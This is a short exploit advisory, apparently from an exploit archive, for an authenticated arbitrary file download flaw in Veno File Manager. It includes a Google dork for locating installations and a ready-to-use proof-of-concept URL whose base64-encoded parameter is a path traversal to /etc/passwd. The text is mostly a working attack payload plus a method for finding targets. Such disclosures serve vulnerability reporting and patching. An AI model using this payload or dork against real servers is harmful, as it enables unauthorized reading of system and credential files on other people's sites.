# Exploit Title : Veno File Manager Arbitrary File Download
Vulnerability# Google Dork : allintitle: "Veno File Manager"# Date :
10/12/2013# Exploit Author : Daniel Godoy# Vendor Homepage :
http://codecanyon.net/item/veno-file-manager/6114247?WT.ac=solid_search_item&WT.seg_1=solid_search_item&WT.z_author=nicolafranchini#
Category : Web applications# Tested on : GNU/Linux  #[PoC]
:#Warning: You must be authenticated
http://localhost/filemanager/vfm-admin/vfm-downloader.php?q=[file to
download- base 64 encoded]

http://localhost/filemanager/vfm-admin/vfm-downloader.php?q=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==